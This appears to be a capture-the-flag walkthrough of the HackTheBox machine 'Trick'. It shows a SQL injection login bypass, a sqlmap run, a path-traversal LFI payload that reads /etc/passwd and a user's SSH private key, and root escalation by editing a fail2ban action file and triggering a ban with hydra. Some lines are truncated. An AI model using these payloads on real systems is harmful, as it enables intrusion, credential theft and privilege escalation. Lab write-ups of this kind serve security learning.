Trick — Hackthebox Walkthrough
Nmap reveals 2 open ports.
nmap -sC -sV -A -T5 10.10.11.166
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| 2048 61:ff:29:3b:36:bd:9d:ac:fb:de:1f:56:88:4c:ae:2d (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC5Rh57OmAndXFukHce0Tr4BL8CWC8yACwWdu8VZcBPGuMUH8VkvzqseeC8MYxt5SPL1aJmAsZSgOUreAJNlYNBBKjMoFwyDdArWhqDThlgBf6aqwqMRo3XWIcbQOBkrisgqcPnRKlwh+vqArsj5OAZaUq8zs7Q3elE6HrDnj779JHCc5eba+DR+Cqk1u4JxfC6mGsaNMAXoaRKsAYlwf4Yjhonl6A6MkWszz7t9q5r2bImuYAC0cvgiHJdgLcr0WJh+lV8YIkPyya1vJFp1gN4Pg7I6CmMaiWSMgSem5aVlKmrLMX10MWhewnyuH2ekMFXUKJ8wv4DgifiAIvd6AGR
| 256 9e:cd:f2:40:61:96:ea:21:a6:ce:26:02:af:75:9a:78 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBAoXvyMKuWhQvWx52EFXK9ytX/pGmjZptG8Kb+DOgKcGeBgGPKX3ZpryuGR44av0WnKP0gnRLWk7UCbqY3mxXU0=
| 256 72:93:f9:11:58:de:34:ad:12:b5:4b:4a:73:64:b9:70 (ED25519)
25/tcp open smtp syn-ack Postfix smtpd
|_smtp-commands: debian.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING
53/tcp open domain syn-ack
|_ bind.version: 9.11.5-P4-5.1+deb10u7-Debian
80/tcp open http syn-ack nginx 1.14.2
|_http-title: Coming Soon - Start Bootstrap Theme
|_http-favicon: Unknown favicon MD5: 556F31ACD686989B1AFCF382C05846AA
|_ Supported Methods: GET HEAD
Service Info: Host: debian.localdomain; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Visiting port 80, we see a static website. Even though I didn’t see a domain name, I added
Since we have port 53 which is DNS open, I started digging in to that. With a little effort I was able to do a zone transfer which gave me 2 different subdomains.
dig @trick.htb axfr trick.htb +answer
I added both of them to the host config and visited the
I was presented with a login page. I was able to bypass authentication and login as Administrator with a simple SQL injection payload.
USER: admin' or 1=1 -- -
Since I had SQL injection there, I though of passing the login request to
sqlmap So I copied the req to
login.req and ran
sqlmap against it.
sqlmap -r login.req — risk=3 — level=3 — threads=10
And it found a time-based SQL injection.
With this, I tried to enumerate the databases. But was taking way too long to dump the content of the databases. Therefore, I took a step back and started to do some vhost fuzzing.
One of the vhosts being
preprod-payroll.trick.htb , I felt maybe there could be other vhosts that stats with
preprod . Because even in some real life scenarios, we do see such vhosts. I.e
dev-db.host.local With this in mind I used
ffuf to fuzz for vhosts.
ffuf -u http://$IP/ -H 'Host: preprod-FUZZ.trick.htb' -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -fw 1697
And I found another vhost called
preprod-marketing.trick.htb But I do have to mention this was not the intended way of finding this. The intended way is to read the nginx config with the SQLi we got. (using
--file-read option in sqlmap)
Anyways, moving forward, I added this to the hosts config and visited the site.
Looking at the other pages, I saw
?page= was used to include the other files.
This was a possible vector for LFI, so I tired the typical LFI payload with was
../../../etc/passwd but it didn’t work. PHP filters didn’t work either. So I had to try a different bypass techniques. What worked for me was to use
So what must have happened was, the index.php must have removed all
../ from the file we specify. That is why our first payload didn’t work. But in our, second payload we had
....// So when
../ is removed from it, the payload becomes
So with this LFI, I was included the
/etc/passwd file and found a user called
curl http://preprod-marketing.trick.htb/index.php?page=....//....//....//etc/passwd --path-as-is
Then I was able to get his ssh private key and login as him.
curl 'http://preprod-marketing.trick.htb/index.php?page=....//....//....//home/michael/.ssh/id_rsa' --path-as-is
chmod 600 id_rsa
ssh firstname.lastname@example.org -i id_rsa
As michael, I ran
sudo -l and saw I was able to execute
fail2ban restart as root without a password.
So with some googling I was able to find a way to exploit this.
Abusing Fail2ban misconfiguration to escalate privileges on Linux
This is the second part of a two-part article. In the first part, I showed how you can gain access to a Linux system by…
Above article goes over how this works. For this to work, I had to make sure that I had write access over
/etc/fail2ban/action.d directory. When I took a look at that, I saw its writable by users in
security group which
michael user is a member of.
So I knew I this exploit was possible. What happens in this attack is that, we are editing a config file that
fail2ban uses to ban uses from access different service for example, ssh. We are changing the command to execute when such an scenario happens to be what we want. Then once such a situation occurs, that command gets executed as root.
Following the walkthrough, I first copied the
/tmp and edited it as follows.
cp /etc/fail2ban/action.d/iptables-multiport.conf /tmp
Then I moved the file back to the initial place where it was
mv /tmpiptables-multiport.conf /etc/fail2ban/action.d/iptables-multiport.conf
After I started brute forcing ssh with a username list and a password list to get banned due to high number of failed authentication attempts.
hydra -L userlist -P passlist ssh://10.10.11.166
Meanwhile its running, I restarted the
fail2ban service as root.
sudo -u root /etc/init.d/fail2ban restart
After about 5 seconds I saw the SUID bit (
+S) was set to
Then I used
bash -p to drop in to a root shell.
Contact me though social media:
Email — email@example.com
Instagram — https://www.instagram.com/_kavi.gihan/
Discord — kavigihan#8518
Happy Hacking !!! 😄